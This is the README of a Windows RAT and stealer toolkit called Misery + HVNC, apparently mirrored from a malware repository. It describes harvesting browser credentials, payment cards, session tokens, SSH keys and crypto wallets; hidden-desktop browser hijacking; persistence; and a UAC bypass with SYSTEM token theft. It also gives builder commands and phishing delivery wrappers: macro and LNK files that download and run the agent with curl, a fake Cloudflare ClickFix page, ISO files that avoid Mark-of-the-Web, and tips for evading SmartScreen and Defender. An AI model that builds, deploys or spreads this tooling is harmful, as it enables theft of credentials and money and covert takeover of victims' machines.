Misery + HVNC

Misery
a devoted sister of the Church of Malware

HVNC RAT and stealer research project, derived from Misery. For local testing and research only.

Features

  • Hidden desktop (hvnc start): GDI apps on a hidden desktop, streamed live
  • Interactive browser (hvnc launch chrome): real Chromium with the victim's logins, driven over CDP
  • Ghosted browser (ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins
  • Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
  • App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
  • Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
  • Payload builder (setup.py): msfvenom-style config, ECDH key handling, and -p delivery wrappers for docm, xlsm, lnk, pdf, html, clickfix_html, iso, polyglot_exe_zip, and polyglot_html
  • Keylogger and clipboard monitoring
  • Persistence: HKCU Run key and WMI event subscriptions
  • Elevation (elevate): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
  • Anti-analysis: user-mode environment checks, reflective injection

Misery operator view

VirusTotal

VirusTotal scan result

Quick start

setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:

python setup.py -g                                        # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent   # non-interactive

Run the console listener, then the agent:

.\build\console.exe
.\build\agent.exe

Type help in the console for the full command list.

Payload wrappers

The builder (setup.py -p <formats>) packages the agent into delivery filetypes in dist/ and records each one in <out>.manifest.json with its sha256 and size. python setup.py --list-formats prints the current list with dependencies.

  • docm - Word macro document; Document_Open shells a hidden cmd/curl download-and-run. The macro comes from a Word-authored compiled base (wrappers_bases/docm_base.docm); only the stage URL and agent filename are injected as document variables and read at open time, because rebuild-generated macro streams open without auto-event hooks (verified live 2026-08)
  • xlsm - Excel macro workbook; Workbook_Open shells a hidden cmd/curl download-and-run. Same design: an Excel-authored compiled base (wrappers_bases/xlsm_base.xlsm) with the runtime values in a hidden cfg sheet
  • lnk - shortcut plus companion .cmd; the LNK probes Downloads/Desktop for the .cmd, which opens a decoy PDF then fetches and runs the agent (the chain lives in the .cmd because Defender's FastPath flags any LNK-launched curl download cmdline)
  • pdf - agent embedded as a PDF attachment, launched on open
  • html - OneDrive-style page; the agent hides in a zip blob behind a button click
  • clickfix_html - fake Cloudflare "Verify you are human" page; checking the box copies a cmd/curl download-and-run command to the clipboard and shows the Win+R / Ctrl+V / Enter steps
  • iso - ISO with the agent inside, sidesteps MOTW
  • polyglot_exe_zip - runs as an exe, opens as a zip holding a document.pdf.lnk and its companion .cmd
  • polyglot_html - runs as an exe, shows a decoy page in a browser
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe

-p all builds every format. The macro, lnk, clickfix, and polyglot_exe_zip formats fetch the agent from STAGE_URL when the target opens them; pdf, html, iso, and polyglot_html carry the agent themselves. The macro files ship with decoy content, and the lnk/pdf formats show a decoy document, so they read as normal business documents instead of empty templates.

The docm and xlsm bases are compiled by Word/Excel themselves so the Document_Open / Workbook_Open hooks actually fire: pyopenvba-style rebuilds write source-only module streams that Office opens in a degraded state where the auto-events never run (reproduced and root-caused live 2026-08). The wrapper copies the base, fills decoy content, and injects the per-build values (Word docvars in word/settings.xml, Excel cfg-sheet cells in xl/sharedStrings.xml); the pre-compiled VBA builds the download chain from Chr()-encoded parts plus those values at open time, so no macro stream is ever rewritten.

The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as STAGE_URL, so host the generated <out>.cmd and <out>.decoy.pdf next to the agent.

Delivery note: browsers tag downloaded files with the Mark-of-the-Web (Zone.Identifier), which trips SmartScreen on macros and executables. Extract a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself propagates it), so the iso wrapper or archiver extraction is the practical route for the macro and exe formats; the pdf and html formats are fine to serve straight from a browser.

The wrappers use these optional libs; a missing lib just skips the formats that need it:

pip install pylnk3 pycdlib pikepdf python-docx openpyxl

The docm/xlsm bases live in wrappers_bases/ and ship with the repo; rebuild them in Office if you ever change the macro logic (see the wrapper docstring notes), then commit the new base.

Commands

Command What it does
bot list bots; bot <id> targets one, bot all broadcasts
steal run credential and session harvesting
loot dump the last steal result JSON raw to the terminal
elevate [system] relaunch the agent as admin; system chains to SYSTEM
hvnc start / hvnc stop start or stop the hidden desktop session
hvnc launch [path] launch an app (default Chrome) on the hidden desktop
hvnc quality [10-100] set streamed frame JPEG quality
ghost <url> open a URL in a ghosted hidden browser
ghost nav <url> navigate the ghost browser
ghost stop stop the ghost session
keylog toggle the keylogger
clip read the victim's clipboard
shell / ps <cmd> run a hidden PowerShell one-liner on the agent
history show command history
clear / exit clear the terminal / quit

Build

Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).

MSVC:

cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release

MinGW:

cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4

A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.

Layout

  • src/agent: entry, C2 client, injector, persistence
  • src/console: operator console + listener
  • src/payload: payload DLL, reflective loader, trampoline
  • src/stealer: Misery-derived sources
  • src/hvnc: hidden-desktop session
  • src/ghost: ghosted browser session
  • src/browser: CDP client (Page/Input over WebSocket)
  • src/rat: keylogger + clipboard
  • src/transport: encrypted TCP framing, HTTPS beacon carrier, compression
  • src/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helpers
  • wrappers_bases/: Office-authored compiled macro bases used by the docm/xlsm wrappers
  • build/: out-of-source build dir

Licence

No licence granted. Research code for study only; not licensed for redistribution or commercial use.

S
Description
Automated archival mirror of churchofmalware.org/JYenn/Misery
Readme
19 MiB
Languages
C++ 87.5%
Python 10.5%
CMake 0.9%
Assembly 0.8%
C 0.3%